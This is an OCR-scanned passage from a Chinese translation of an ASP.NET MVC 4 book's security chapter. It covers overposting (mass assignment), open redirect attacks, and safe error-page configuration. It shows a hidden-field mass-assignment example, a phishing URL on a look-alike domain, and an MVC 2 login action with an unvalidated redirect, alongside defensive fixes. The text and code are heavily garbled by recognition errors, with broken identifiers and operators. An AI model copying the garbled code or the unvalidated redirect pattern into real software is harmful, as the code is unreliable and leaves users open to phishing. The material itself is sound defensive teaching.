模型 属性 从 而 极 大 地 简化 了 处 理 用 户 输 入 的 过 程 。 然 而 ， 它 也 成 了 攻击 的 男 一 种 媒介 ， 给 
攻击 者 提供 了 一 个 填充 模型 属性 的 机 会 ， 有 些 时 候 填 充 的 这 些 属性 甚至 都 没有 在 输入 表 


单 中 。 
本 节 将 讲解 重复 提交 (overposting) 攻 击 ， 主 要 从 它 的 危害 及 如 何 防御 两 方面 来 前 述 。 
1. 威胁 概述 


ASPNET 模型 绑 定 通过 重复 提交 呈现 了 另 一 种 攻击 媒介 。 下 面 列 举 了 一 个 例子 ， 其 中 
有 一 个 允许 用 户 提 交 评 价 意 见 的 商店 商品 页 面 


public class Review | 

public int ReviewID { get; set; } // Primary key 
public int ProductID { get; set; } // Foreign key 
public Product Product { get; set; } // Foreign entity 
public string Name 1{ get; set; 上 } 

Public string Comment { get; set; |} 

public bool Approved { get; set; 上 } 


} 

我 们 想 向 用 户 展示 一 个 简单 表单 ， 其 中 只 包含 两 个 字段 一 一 Name 和 Comment: 

Name: QHtml .TextBox ("Name") <br /> 

Comment: (QHtml .TextBox ("Comment"™) 

因为 上 只 让 用 户 在 表单 上 看 到 Name 和 Comment 字段 , 所 以 我 们 不 希望 用 户 能 够 目 己 审 
核 通 过 自己 的 评论 。 然而 , 存在 大 量 的 Web 开发 工具 可 供 恶 意 用 户 向 查询 字符 串 或 提交 的 
表单 数据 中 添加 "Approved=true"， 从 而 实现 干预 表单 提交 。 而 事实 上 ， 模 型 绑 定 堪 并 不 知 
道 提 交 的 表单 中 包含 哪些 字段 ， 并 且 还 会 将 他 们 的 Approved 属性 设置 为 true。 

更 糟 的 是 ， 由 于 Review 类 中 有 一 个 Product 属性 ， 因 此 黑客 可 以 尝试 提交 一 些 名称 类 
似 于 Product.Price 的 字段 值 ， 这 样 可 能 会 改变 表 中 的 一 些 值 ， 而 这 些 值 的 修改 超出 了 最 终 
用 户 的 操作 权限 。 


示例 : GITHUB.COM 上 的 大 规模 任务 分 配 

这 种 攻击 利用 了 一 个 基于 MVC 架构 模式 的 特征 , 该 特征 在 许多 Web 框架 中 都 有 应 用 。 
2012 年 3 月 , 这 种 攻击 利用 Ruby on Rails 的 大 规模 任务 分 配 功 能 (mass assignment feature)， 
被 成 功 应 用 于 GitHub.com 网 站 的 攻击 。 攻 击 者 创建 了 一 个 新 的 公共 密 钥 来 管理 更 新 ,并 通 
过 回 创 建 密 钥 的 表单 中 添加 隐藏 字段 ， 手 动 将 新 创建 的 密 钥 添加 到 “rails” 用 户 的 管理 用 
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户 记录 中 : 

<input type=hidden Value=USER ID OF TARGET ACCOUNT 

name=public keyluser id]> 

攻击 者 把 目标 账户 的 用 户 ID 插入 到 表单 域 的 value 特性 中 ， 并 提交 表单 ， 然 后 就 拥有 
了 目标 用 户 内 容 的 管理 权限 。 攻 击 者 在 一 个 非常 简洁 的 博客 帖子 中 描述 了 这 次 攻击 ， 博 客 
网 址 ; 


http://homakov.blogspot.com/2012/03/how-—to.html 


GitHub 立即 修复 了 错误 ， 它 增加 了 对 传 入 表单 参数 的 验证 ， 关 于 修复 的 博客 文章 网 址 
如 下 : 


https://github.com/blog/1068-public-key-—-security-—vulnerability-and-—miti 


gation 
问题 的 关键 在 于 ， 这 不 仅仅 是 理论 上 的 攻击 。 这 次 事件 之 后 ， 这 种 攻击 便 广 为 人 知 。 
2. 使 用 Bind 特性 防御 重复 提交 攻击 


防御 重复 提交 攻击 的 最 简单 方法 就 是 ， 使 用 [Bind] 特 性 显 式 地 控制 需要 由 模型 绑 定 句 
绑 定 的 属性 。Bind 特性 既 可 以 放 在 模型 类 上 ， 也 可 以 放 在 控制 占 操 作 参 数 中 。 它 可 以 使 用 
前 面 介 绍 的 白 名 单方 法 来 指定 允许 绑 定 的 字段 ， 比 如 [Bind(Include="Name, Comment")]， 也 
可 以 使 用 黑 名 单方 法 排除 禁止 绑 定 的 字段 ， 比 如 [Bind(Exclude="ReviewID，ProductID， 
Product, Approved")。 通 常情 况 下 ， 白 名 单 相 对 于 黑 名 单 来 说 要 更 安全 些 ， 因 为 它 列举 了 想 
要 绑 定 的 属性 ， 而 黑 名 单列 举 了 所 有 不 想 绑 定 的 属性 ， 显 然 ， 前 者 更 容易 得 到 你 证。 

下 面 给 出 了 如 何 注 解 Review 类 ， 从 而 只 允许 绑 定 Name 和 Comment 属性 的 代码 : 

[Bind (Include="Name, Comment™)]| 

public class Review | 

public int ReviewID { get; set; } // Primary key 

public int ProductID 1{ get; set; } // Foreign key 

public Product Product { get; set; } // Foreign entity 

public string Name 1{ get; set; 上 } 

public string Comment 1{ get; set; |} 

public bool Approved 1{ get; Set 上 } 

} 

男 一 种 方法 是 使 用 UpdateModel 或 TryUpdateModel 方 法 的 一 个 重 载 版 本 来 接收 一 个 绑 
定 列 表 ， 代 人 码 如 下 所 示 : 


UpdateModel (review, "Review", new string[] { "Name", "Comment™ }); 


避免 直接 绑 定 到 数据 模型 也 是 有 效 防 御 重 复 提交 攻击 的 一 种 方式 。 它 通过 使 用 一 个 视 
图 模型 (View Model))， 只 缓存 允许 用 户 设置 的 属性 来 阻止 攻击 。 下 面 的 视图 模型 就 消除 了 
重复 提交 问题 ; 
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public class RevilewViewModel |{ 
public string Name 1{ get; set; 上 } 
public string Comment 1{ get; set; } 


} 
多 注意 Brad Wilson 撰写 了 一 篇 好 文章 , 题目 为 “Input Validation vs. Model 
Validation”， 这 篇 文章 综述 了 模型 验证 的 安全 问题 。 当 验证 功能 包含 在 MVC 
2 中 发 布 时 ， 这 篇 文章 就 已 经 创作 完成 ， 但 到 现在 它 对 我 们 仍然 有 帮助 。 如 果 


感 兴趣 ， 可 以 进行 阅读 ， 网 址 : 


http://bradwilson.typepad.com/blog/2010/01/input-validation—vs— 
model-—validation-in-aspnet—mvcec.html.。 


7.5.5 威胁: 开放 重 定向 


从 MVC 3 开始 ，Internet 项 目 模板 对 AccountController 控制 器 做 了 一 些 新 的 改动 来 阻 
止 开 放 重 定 辣 攻击 。 本 节 首 先 介 绍 开放 重 定 向 攻击 的 工作 原理 ， 然 后 介绍 如 何在 ASPNET 
MVC 应 用 程序 中 阻止 开放 重 定 向 攻击 。 此 外 ， 本 节 还 将 详细 讨论 MVC 3 对 控制 器 
AccountController 所 做 的 修改 ， 并 展示 如 何 将 这 些 修 改 应 用 于 现 有 的 MVC 1 及 MVC 2 应 
用 程序 。 


1. 威胁 概述 


那些 通过 请 求 ( 如 查询 字符 串 和 表单 数据 ) 指 定 重 定 疝 URL 的 Web 应 用 程序 可 能 会 被 算 
改 ， 而 把 用 户 重 定 疝 到 外 部 的 恶意 URL。 这 种 算 改 束 被 称 为 开放 重 定 同 攻 击 (open redirection 
attack)。 

每 当 应 用 程序 重 定向 到 一 个 指定 的 URL 时 ， 就 必须 确保 重 定向 的 URL 未 被 算 改 。 对 
于 MVC 1 和 MVC 2， 默 认 AccountController 控制 器 中 的 登录 操作 极 易 受到 开放 重 定向 攻 
击 。 这 里 作为 一 个 例子 展示 MVC 1 和 MVC 2 的 漏洞 ， 并 介绍 MVC 3 和 MVC 4 如 何 防止 
这 一 漏洞 。 


1) 一 个 简单 的 开放 重 定 向 攻击 

为 了 更 好 地 理解 这 个 问题 ， 首 先 介绍 一 下 默认 的 MVC 2 Web 应 用 程序 中 登录 重 定 辐 
的 工作 原理 。 在 这 种 应 用 程序 中 ， 如 果 未 经 授权 的 用 尸 笃 试 访问 一 个 市 有 Authorize 特性 
的 控制 器 操作 , 那么 他 就 会 被 重 定 同 到 /Account/LogOn 视图 。 这 个 重 定 同 到 /Account/LogOn 
的 URL 包含 一 个 returmmUrl 查询 字符 串 ， 以 便 用 户 登 录 成 功 后 返回 到 原来 请 求 的 URL 上 。 

从 图 7-20 中 可 以 看 出 , 在 没有 登录 的 情况 下 , 尝试 访问 视图 /Account/ChangePassword， 
就 会 重 定 癌 人 到 /Account/LogOn?ReturnUrl=%2fAccount%2fChangePassword%2f 页 面 。 
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到 7-20 


由 于 没有 对 ReturnUrl 得 询 字符 串 参 数 进 行 验证 ， 因 此 攻击 者 可 以 修改 这 个 参数 ， 从 
而 向 其 中 注入 任意 的 URL 地 址 来 实现 开放 重 定 回 攻击 。 为 了 说 明 这 个 问题 ， 现 将 参数 
ReturnUrl 的 值 修改 为 http://bing.com， 所 以 最 终 登 录 的 URL 是 /Account/LogOn?ReturnUrl 
=http:/www.bing.comy/。 这 样 的 话 ， 一 旦 成 功 登 录 站 点 ， 用 户 束 会 被 重 定 加 到 http://wwwi.bing. 
com 页 面 。 此 外 ， 因 为 不 会 对 这 个 重 定 回 的 URL 进行 验证 ， 所 以 它 很 可 能 指 同 一 个 试图 其 
骗 用 户 的 恶意 站 点 。 


2) 一 个 复杂 的 开放 重 定 向 攻击 

因为 攻击 者 知道 用 户 要 登录 的 网 站 , 这 使 得 用 户 很 容易 受到 钓鱼 攻击 (phishing attack)， 
所 以 开放 重 定 同 攻 击 极其 危险 。 例 如 ， 攻 击 者 同 站 点 用 户 发 送 恶 意 的 电子 邮件 试图 捕获 他 
们 的 密码 。 下面 前述 这 种 攻击 是 如 何在 NerdDinner 站 点 上 运作 的 (注意 : 目前 的 NerdDinner 
己 经 进行 了 更 新 ， 来 防御 开放 重 定 同 攻 击 )。 

育 先 ， 攻击 者 占用 户 发 送 一 个 指 同 NerdDinner 站 点 的 登录 页 面 链接 ， 其 中 包含 了 重 定 
问 到 他 们 的 伪造 页 面 的 URL 链接 ; 


http://nerddinner.com/Account/LogOn?returnUrl=http://nerddiner.com/ 
Account/Logon 


请 注意 返回 的 URL 指向 nerddinercom, 其 中 的 dinner 少 了 一 个 字母 n, 在 这 个 例子 中 ， 
攻击 者 控制 者 nerddiner.com 域 。 当 访问 前 耐 的 链接 时 ， 就 会 链接 到 合法 的 NerdDinnercom 
的 登录 页 面 ， 如 图 7-21 所 示 。 


gdlaaa 


Log On 
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using a NerdDinner account 
Lsemame 
Password 
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‘i in ET i | Prodected Mlode On Ih 三 D0 Ba 


图 7-21 


当成 功 登 录 后 ，ASPNET MVC 中 AccountController 控制 器 的 LogOn 操作 就 会 重 定 辐 
到 由 returmUrl 查询 字符 串 参数 指定 的 URL 地 址 。 在 这 个 例子 中 ， 指 定 的 URL 是 由 攻击 者 
输入 的 地 址 http://nerddiner.com/Account/LogOn。 除 非 非常 警惕 ， 否 则 很 难 察觉 到 这 是 伪造 
的 登录 页 面 ， 当 攻击 者 非常 精心 地 设计 了 登录 页 面 ， 使 其 能 达到 以 假 乱 真 的 地 步 时 尤其 如 
此 。 伪 造 的 登录 页 面 会 包含 一 个 错误 消息 ， 它 要 求 用 户 重 新 登录 ， 如 图 7-22 所 示 。 此 时 被 


愚 卉 的 用 户 可 能 还 会 认为 目 己 刚才 一 定 输 错 了 密 但 。 
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当 用 户 重 新 输入 用 户 名 和 密码 后 ， 伪 造 的 登录 页 面 就 会 保存 这 些 信息 ， 并 重 定 向 到 合 
法 的 NerdDinnercom 站 点 。 这 时 ，NerdDinnercom 站 点 已 经 进行 了 验证 ， 所 以 伪造 的 登录 
页 面 可 以 直接 重 定 问 到 NerdDinner 站 点 首页 。 最 终 的 结果 是 ， 攻 击 者 拥有 用 户 的 用 户 名 和 
密码 ， 而 用 户 却 不 知道 自己 已 经 把 这 些 信息 提供 给 他 们 了 。 


3) AccountController 控制 器 中 操作 LogOn 的 脐 和 能 代码 
下 面 的 代码 展示 了 MVC 2 应 用 程序 中 的 LogOn 操作 。 注 意 一 旦 成 功 登 录 ， 控 制 右 就 
返回 一 个 重 定 同 到 的 returnUrl。 从 下 面 的 代码 中 可 以 看 出 没有 对 returnUrl 参数 进行 任何 


[HttpPpost]| 
public ActionResult LogOn (LogonModel model, string returnUrl) 
{ 
ift (ModelSstate.IsValid) 
| 
ift (MembershipService.ValidateUser (model .UserName, model .Password)) 
{ 
FormsService.Signln (model .UserName, model .RememberMe); 
if (!String.IsNulloOrEmpty (returnUr]l),) 
{ 
return Redirect (returnUrl);} 
} 
else 
{ 
return RedirectToAction({(" "Index"”, "Home™}); 
} 
} 
el]se 
{ 
Modelstate.AddModelError(™", 
"The user name or password provided 1s incorrect.™); 
} 


} 


// If we got this far, something failed, redisplay form 
return View (model).; 
} 
下 向 修改 了 MVC 4 应 用 程序 中 的 Login 操作 。 显 而 易 见 ， 下 面 代码 调用 了 Redirect- 
ToLocal 困 数 , 这 样 转 而 可 以 对 returnUrl 参数 进行 验证 ,只 需 调 用 名 为 HLocalUrlO 的 方法 ， 
该 方法 位 于 System.Web.Mvc.Url 辅助 类 中 ， 代 码 如 下 : 


/1 
// POST: /Account/Login 


[HttpPost | 
[Al lowAnonymous | 


第 7 章 成 员 资格 、 授 权 和 安全 性 


[ValidateAntiForgeryToken | 
public ActionResult Login (LoginModel model, string FetuTrnUT1 |) 
{ 
ift (Modelstate.IsValid && WebSecurity.Loginl( 
model .UserName, model .Password, persistCookie: model .RememberMe)) 
[ 
return RedirectToLocal (returnUrl). 


} 


// If we got this far, something failed, redisplay form 
Modelstate.AddModelError(™", 

"The user name or password provided js jncorrect."™);} 
return Viewl(model).; 


} 


private ActionResult RedirectToLocal (string returnUr]l) 


{ 
if (Url .IsSDocalLUTJ (returnUrl)) 
{ 
return Redirect (returnUrl).:; 
} 
else 
L 
return RedirectToAction{("Index", "Home™),; 
} 
} 


2. 保护 ASP.NET MVC 1 和 ASP.NET MVC 2 应 用 程序 


我 们 可 以 在 现 有 的 MVC 1 和 MVC2 应 用 程序 中 利用 MVC3 和 MVC 4 中 对 账户 控制 
器 的 更 新 。 例 如 ,我 们 可 以 向 现 有 的 MVC 1 和 MVC 2 应 用 程序 中 添加 IsLocalUrl0 辅 助 方 
法 ， 更 新 它们 的 LogOn 操作 来 验证 returnUrl 参数 。 

事实 上 ,UrlHelper 辅助 类 的 IsLocalUrl0 方 法 内 部 调用 了 System.Web.WebPages 的 方法 ， 
之 所 以 这 样 ， 是 因为 ASPNET Web Pages 应 用 程序 也 要 采用 这 种 验证 方式 : 

public bool IsLocalUrl (string url) I 


return System.Web.WebPages.RequestExtensions.1IsUrlLocalToHost( 
RequestContext .HttpContext .Request, url); 


} 

实际 上 是 IsUrlLocalToHost 方法 包含 了 验证 逻辑 ， 下 向 的 代码 是 以 说 明 这 一 点 : 
public static bool IsUrlLocalToHost (this HttpRequestBase request, string UTJ) 
{ 


return ‘url.IsEmpty() && 
{( (url[0] =—= '/" && (url.Length == 1 || (url[1] != '/" && url[1l] != "'\\'))) || 
/i “i/™ or /foo™w but not "wv//™ or vw/\" 
(url.Length > 1 && url[0] == ~" && url[l] == "/"')); 
/i ~/ oOr "~/foo™ 


175 


ASPNET MVC 4 高 级 编程 (第 4 版 ) 


在 MVC 1 和 MVC 2 应 用 程序 中 ， 程 序 员 为 了 对 返回 的 returnUrl 进行 验证 ， 同 控制 如 
AccountController 中 添加 了 IsLocalUrl0 方 法 ， 但 是 如 果 可 能 的 话 ， 笔 者 鼓励 将 其 添加 到 一 
个 单独 的 辅助 类 中 。 为 使 IsLocalUrl0 方 法 能 在 控制 器 AccountController 中 工作 ,笔者 建议 
对 它 的 ASPNET MVC 3 版 本 进行 两 处 细微 修改 ， 如 下 所 示 : 
e@ 将 其 从 公共 方法 修改 为 私有 方法 ， 因 为 控制 占 中 的 公有 方法 可 以 作为 控制 右 操 作 
被 访问 。 

e 修改 检查 URL 主机 的 调用 而 不 是 应 用 程序 主机 的 调用 。 修 改 前 的 调用 采用 了 
UrlHelper 类 中 的 本 地 字段 RequestContext。 修 改 后 使 用 的 是 this.Request.Url.Host,， 
而 不 是 this.RequestContext.HttpContext.Request.Url.Host。 

下 面 的 代码 演示 了 修改 后 的 HLocalUrI0O 方 法 在 ASPNET MVC 1 和 ASPNET MVC 2 
应 用 程序 控制 器 类 中 的 应 用 : 


/7 Note: This has been copied fromthe SVstem.Web .WebPades RequestExtensions class 
private bool IsLocalUrl (string url) 


{ 
ift (string.IsNullorEmpty (url)) 
1 
return false; 
} 


Uri absoluteUri? 
if (Uri.TryCreate (url, UriKind.Absolute, out absoluteUr1i)) 


{ 
return String.Equals (this.Request .UT1L -Host， 
absoluteUri.Host, StringComparison.oOrdinallgnoreCase);}; 
} 
else 
{ 
bool isLocal = Iurl.IsEmpty({() ES&& 
({(url[0] == "/" && (url.Length == 1 || 
(url[l] := "/" && Url[LL] := "MW"})})} 1 
(url.Length > 1 && url[0] == "~" && Url[1] == "/")); 
return isLocal; 
} 


} 


编写 好 IsLocalUrl0 方 法 后 ， 就 可 以 在 LogOn 操作 中 调用 它 来 对 返回 的 returnUrl 参数 
进行 验证 ， 代 码 如 下 所 示 : 


[HttpPpost]| 
public ActionResult LogOn (LogonModel model, string returnUrl]l) 
{ 

i (ModelSstate.IlIsValid) 

! 


if (Membership.ValidateUser (model .UserName, model .Password)) 
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FormsAuthentication.SsSetAuthCookie (model .UserName, model .RememberMe); 
ift (Url.IsLocalUrl (returnUrl)})) 
{ 

return Redirect (returnUrl);} 


} 


已 Se 
{ 
return RedirectToAction("Index", "Home”) ; 
} 
} 
else 


{ 
ModelsState.AddModelError(™"", 


"The user name or password provided 1s incorrect."™);} 


// If we got this far, something failed, redisplay form 
return View(model);} 


} 


现在 可 以 通过 尝试 登录 带 有 外 部 返回 returnUrl 的 URL 来 测试 开放 重 定向 攻击 。 不 妨 
继续 使 用 前 面 的 URL 一 一 /Account/LogOn?ReturnUrl=http://www.bing.com/。 图 7-23 展示 
了 带 有 返回 URL 的 登录 画面 , 图 中 显示 的 URL 会 在 登录 后 尝试 把 用 户 导 航 到 外 部 的 其 他 
站 点 。 


My MVC Application 


Log On 
please enter your usemame and password. Register ff you dont have an account. 


Account Information 


Lser name 
PasswWword 


四 Remember me? 


钨 :Local intranet | Protected Mode Off 


图 7-23 
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成 功 登 录 后 , 用户 会 被 重 定 问 到 Home/Index 控制 需 操 作 而 不 是 外 部 的 URL, 如 图 7-24 
所 示 。 


Welcome Administrator! [ Leg Qff ] 


eee | oe 


My MVC Application 


i Local intranet | Protected Mode: Off 
图 7-24 
3. 当 检 测 到 开放 重 定向 攻击 时 采取 的 额外 措施 


当 检 测 到 开放 重 定 同 攻 击 时 ，LogOn 操作 可 以 采取 其 他 一 些 额 外 措施 。 例 如 ， 使 用 免 
费 的 ELMAH 日 志 库 把 检测 到 的 开放 重 定 癌 攻 击 作为 安全 弄 币 记录 下 来 ， 并 显示 一 条 目 定 
义 的 登录 消息 ， 告 知 用 户 他 们 已 经 被 记录 ， 他 们 操 击 的 登录 链接 可 能 是 恶意 的 。 这 种 迎 辑 
在 LogOn 操作 的 else 代码 块 中 实现 ， 如 下 所 未 : 


[HttpPost]| 
public ActionResult LogOn (LogOnModel model, string returnUrl]l) 
{ 
if (Modelstate.IsValid) 
{ 
ift (MembershipService.ValidateUser (model .UserName, model .Password)) 
{ 
FormsService.SignlIn (model .UserName, model .RemembeTMe) :， 
if {IsLocalUrl (returnUrl)})) 
{ 
return Redirect (returnUrl);} 
} 
else 
{ 
/:/ Actions on for detected open redirect go here. 
string message = string.Format ( 
“Open redirect to to {0} detected.", returnUrl)}); 
ErrorSignal.FromCurrentContext() .Raisel 
new SyStem.Security.SecurityException (message})); 
return RedirectToActijion(" SecurityWarning", "Home™); 
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} 
已] Se 
{ 
Modade1Sstate .AdadqMoadeTETrTOT ( 
“The user name or password provided is jncorrect."™);} 
} 


} 


// If we got this far, something failed, redisplay form 
return View (model).; 


上 
在 MVC 4 应 用 程序 中 ， 我 们 在 RedirectToLocal 方法 中 处 理 额 外 的 日 志 : 


private ActionResult RedirectToLocal (string returnUr]l) 


{ 
i (Url.IsLocalUrl (returnUrl),) 
{ 
return Redirect (returnUrl).; 
} 
else 
L 
// Actions on for detected open redirect go here. 
string message = string.Format ( 
"Open redirect to to {0} detected.", returnUr]l).; 
ErrorSignal .FromCurrentContext () .Ralise( 
new System.Security.SecurityException (message)).; 
return RedirectToAction("SecurityWarning", "Home™").; 
} 
} 


4. 开放 重 定 同 小 结 


我 们 把 重 定向 URL 作为 参数 在 应 用 程序 的 URL 中 传递 ， 很 可 能 会 导致 开放 重 定向 攻 
击 。 笠 好 ，MVC 3 和 MVC 4 框架 中 包含 防御 开放 重 定 同 攻击 的 代码 ， 而 且 这 些 代 码 稍 加 
修改 便 可 在 MVC 1 和 MVC 2 的 程序 中 应 用 。 为 使 用 户 在 登录 MVC 1 和 MVC 2 应 用 程序 
时 免 受 开放 重 定 回 攻 击 ， 我 们 可 以 癌 LogOn 操作 中 添加 IsLocalUrl0 方 法 来 验证 returmUrl 
参数 。 


7.6 适当 的 答 误 报 各 和 堆 枝 跟 踩 


几乎 所 有 网 站 在 开发 过 程 中 都 在 web.config 文件 中 设置 了 特性 <customErrors mode= 
"off'> 。 虽 然 这 一 设置 并 不 专用 于 ASPNET MVC， 但 是 因为 经 常 这 样 设 置 ， 所 以 很 值得 在 
安全 性 的 章 市 中 提出 来 。 

customErrors 模式 有 3 个 可 选 设置 项 ， 分 别 是 : 

e On: 服务 器 开发 的 最 安全 选项 ， 因 为 它 总 是 隐藏 错误 提示 消息 。 
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e RemoteOnly: 向 大 多 数 用 户 展 示 一 般 的 错误 提示 消息 ， 但 向 拥有 服务 器 访问 权限 
的 用 户 展 示 完 整 的 错误 提示 消息 。 

e Off: 最 容易 受到 攻击 的 选项 , 它 向 访问 网 站 的 每 个 用 户 展示 详细 的 错误 提示 消息 。 

详细 的 错误 提示 消息 可 能 会 暴露 应 用 程序 的 内 部 结构 。 攻 击 者 如 果 了 解 了 程序 的 内 部 
结构 ， 再 对 程序 进行 攻击 就 轻而易举 了 。 因 此 为 了 获取 详细 的 错误 提示 消息 ， 黑 客 会 想 方 
设法 让 网 站 出 现 错 误 , 比如 他 可 能 使 用 格式 错误 的 URL 回 控 制 器 发 送 损坏 的 信息 , 或 者 捍 
曲 查 询 池 符 串 ， 当 需要 发 送 一 个 整 型 数值 时 ， 却 癌 服 务 嚣 发送 一 个 字符 串 。 

当 排 除 服务 器 上 的 故障 时 ， 暂时 地 关闭 Custom Errors 特性 会 令 攻 击 者 们 垂 泗 三 尺 。 因 
为 禁用 了 Customs Errors( 即 mode="off") 之 后 ， 当 再 出 现 异 常 时 ，ASPNET 运行 时 就 会 回访 
问 网 站 的 每 个 用 户 展示 详细 的 错误 提示 消息 ， 而 详细 的 错误 提示 消息 中 包含 了 出 错 地 方 的 
源 代 码 。 如 果 此 时 有 人 对 网 站 有 不 良 企 图 ， 就 会 趁机 大 量 窃取 程序 源 代 码 并 查找 其 中 的 淤 
在 漏洞 ， 然 后 利用 这 些 漏洞 窃取 数据 或 者 关闭 应 用 程序 。 

这 个 问题 的 根源 在 于 事件 出 现 之 后 才 去 考虑 错误 处 理 的 问题 ， 因 此 ， 显 而 易 见 ， 解 决 
这 个 问题 的 方法 就 是 先发制人 ， 也 就 是 在 突 发 事件 出 现 之 前 考虑 错误 处 理 。 
7.6.1 使 用 配置 转换 

如 果 想 在 其 他 服务 器 (如 在 一 个 阶段 或 测试 环境 ) 上 也 能 得 到 详细 的 错误 提示 消息 ， 那 
么 推荐 在 构建 配置 的 基础 上 使 用 web.config 转换 来 管理 customErrors 设置 。 当 创建 一 个 新 
的 ASPNET MVC 4 应 用 程序 时 ， 它 会 默认 为 调试 和 发 布 配置 设置 配置 转换 ， 并 且 还 可 以 
很 容易 地 为 其 他 环境 添加 额外 转换 ASPNET MVC 应 用 程序 中 包含 的 Web.Release. config 
转换 文件 中 含有 如 下 代码 : 


<Ssystem.web> 


<compilation xdt:Transform="RemoveAttributes (debug)™ /> 

i 
In 七 he example below, the "Replace" transform will replace 七 he entire 
<CUStomErrors> section of your web.config file. 
Note that because there is only one customErrors section under 七 he 
<Ssystem.web> node, there is no need to use the "xdt:Locator” attribute. 


<CuUuStomErrors deftaultRedirect="GenericError.htm" 
mode="RemoteOnly” xdt:Transform="Replace"> 
<error statusCode="500™ redirect="InternalError.htm"/> 
</customErrors> 
一 一 
</system.web> 


当 在 Release 模式 下 构建 应 用 程序 时 ， 上 面 转换 中 注释 掉 的 配置 代码 可 以 用 RemoteOnly 
模式 奉 换 customErrors 模式 。 开 局 该 配置 转换 和 取消 注释 customErrors 节点 一 样 简单 ， 代 
位 如 下 上 所 未 : 
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<System.web> 
<compilation xdt:Transform="RemoveAttributes (debug)™ /> 
es 
In 七 he example below, the "Replace" transform will replace 七 he entire 
<cCustomErrors> sectijon of your web.config file. 
Note that because there is only one customErrors section under 七 he 
<Ssystem.web> node, there is no need to use the "xdt:Locator” attribute. 
一 一 六 
<CuStomErrors defaultRedirect="GenericError.htm" 
mode="RemoteOnly” xdt:Transform="Replace"> 
<error statusCode="500™ redirect="InternalError.htm"/> 
</customErrors> 


</system,.web> 


7.6.2 在 生产 环境 中 使 用 Retail 部 署 配 置 


这 种 方法 不 是 胡乱 编辑 各 个 配置 设置 ， 而 是 利用 了 ASPNET 特性 : Retail 部 署 配置 。 
但 是 这 一 特性 没有 得 到 充分 利用 。 

部 署 配置 是 服务 器 的 machine.config 文件 (在 %windir%\Microsoft .NET\Framework\ 
<frameworkversion>\Config 目录 下 ) 中 的 一 个 向 单 开 关 ， 用 来 标识 ASPNET 是 否 在 Retail 
部 署 模式 下 运行 。 该 部 署 配 置 有 两 个 设置 : retail 要 么 是 true 要 么 是 false。deployment/retail 

和 默认 值 是 false; 可 以 用 下 面 的 配置 方法 将 其 设置 为 true: 


<Ssystem.web> 
<deplovyment retail="true" /> 
</system.web> 


将 deployment/retail 设置 为 tre， 将 会 影 啊 以 下 几 项 设置 : 

e customErrors 模式 被 设置 为 On， 也 就 是 最 安全 的 设置 。 

e 禁用 跟踪 输出 。 

e 禁用 调试 。 

这 些 设置 可 以 履 盖 web.config 文件 中 所 有 应 用 程序 级 别 的 设置 。 


7.6.3 使 用 专门 的 错误 日 志 系 统 


事实 上 ， 最 好 的 解决 方法 是 在 任何 环境 中 都 不 关闭 目 定 义 错误 。 笔 者 推荐 使 用 专门 的 
错误 日 志 记 录 系 统 ， 如 ELMAH( 本 章 前 面部 分 曾 提 及 )。ELMAH 可 以 通过 NuGet 获得 ,， 它 
提供 了 多 种 查看 错误 信息 的 安全 方法 。 例 如 ， 可 以 利用 ELMAH 把 错误 信息 写 入 到 一 个 不 
在 网 站 上 公布 的 数据 库 表 中 。 

想 更 多 地 了 解 如 何 配置 和 使 用 ELMAH， 可 登录 以 下 网 址 : http:Wcode.google.comy 
pelmahv 。 
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7.7 ”安全 回顾 和 有 用 资源 


表 7-1 回顾 了 常见 的 一 些 网 络 安全 威胁 及 其 解决 方法 。 


表 7-1 ASP.NET 安全 威胁 及 解决 方法 


威胁 解决 方法 
自满 自我 训练 。 假 设 应 用 程序 将 被 黑客 攻击 。 记 住 :保护 好 自己 的 数据 最 重要 
跨 站 脚本 攻击 (XSS) 使 用 HTML 编码 所 有 内 容 。 编 码 特 性 。 记 住 JavaScript 编码 。 如 有 可 能 ， 
使 用 AntiXSS 类 
跨 站 请 求 伪 造 (CSRF) 令 牌 验证 。 窜 等 的 GET 请 求 。HttpReferrer 验证 
重复 提交 使 用 Bind 特性 显 式 地 绑 定 白 名 单 或 者 拒绝 黑 名 单 


ASPNET MVC 框架 提供 了 保护 网 站 安全 的 多 种 工具 ， 但 是 如 何 利 用 这 些 工具 取决 于 
个 人 。 真正 的 安全 需要 持续 不 断 的 努力 , 来 监控 和 应 对 不 断 变化 的 威胁 。 这 是 我 们 的 责任 ， 
但 我 们 并 非 孤 军 作 战 , 因为 在 Microsoft Web 开发 领域 和 因特网 安全 领域 里 有 很 多 高 质量 的 
资源 。 表 7-2 列 出 了 第 用 的 一 些 资源 : 

表 7-2 安全 资源 
资源 名 称 
Microsoft 安全 开发 中 心 
图 书 : 《ASP.NET 安全 编程 入 门 经 典 》 
(由 清华 大 学 出 版 社 引 进 并 出 版 ，ISBN 
为 9787302263746) 
免费 电子 书 : OWASP Top 10 for NET 


URL 
http://msdn.microsotft.comyen-us/security/default.aspx 


http://www.tupwk.com.cnv/downpage 


http://Wwww.troyhunt.com/2010/05/0owasp-top-10-for-netdevelop 


developers 

Microsoft Code Analysls Tool .NET 
(CAT.NET) 

AntiXSS 

Microsoft 信息 安全 开发 团队 (AntiXSS 
和 CATNET 的 开发 团队 ) 

开放 式 Web 应 用 程序 安全 项 目 (OWASDP) 


ers-part-1.html 
http://Wwww.mcrosoft.com/downloads/detalls.aspx?FanmlylId=01 
78e2ef-9da8-445e-9348-c93f24cc9f9d&cdisplaylane=en 
http://antixss.codeplex.comy/ 
http://blogs.msdn.com/securitytools 


http://WWww.owasp.ore 


7.8 小结 


章 以 这 样 的 方式 开始 ， 也 应 该 适合 以 这 样 的 方式 结束 : ASPNET MVC 提供 了 大 量 


的 控制 并 且 同 时 删除 了 开发 人 员 认 为 是 障碍 的 大 部 分 抽象 。 目 由 越 多 ， 能 力 越 大 ， 相 应 


182 


第 7 章 成 员 资格 、 授 权 和 安全 性 


地 ， 能 力 越 大 ， 承 担 的 贡 任 也 就 越 多 。 

Microsoft 公司 致力 于 帮助 我 们 “ 吃 一 年 ， 长 一 智 ”， 也 束 是 说 ，ASPNET MVC 团队 和 希 
望 我 们 能 够 简单 清楚 地 做 正确 的 事情 。 然 而 并 非 每 个 人 的 想法 都 一 样 ， 因 上 此， 这 无 疑问 的 
存在 下 和 面 的 情况 : ASPNET MVC 团队 决定 采用 的 框架 可 能 与 我 们 通 币 使 用 的 方式 不 一 致 。 
幸好 ， 当 这 种 情况 发 生 时 ， 我 们 可 以 使 用 自己 的 方式 来 实现 ， 这 也 正 是 ASPNET MVC 框 
架 主 目 所 在 。 

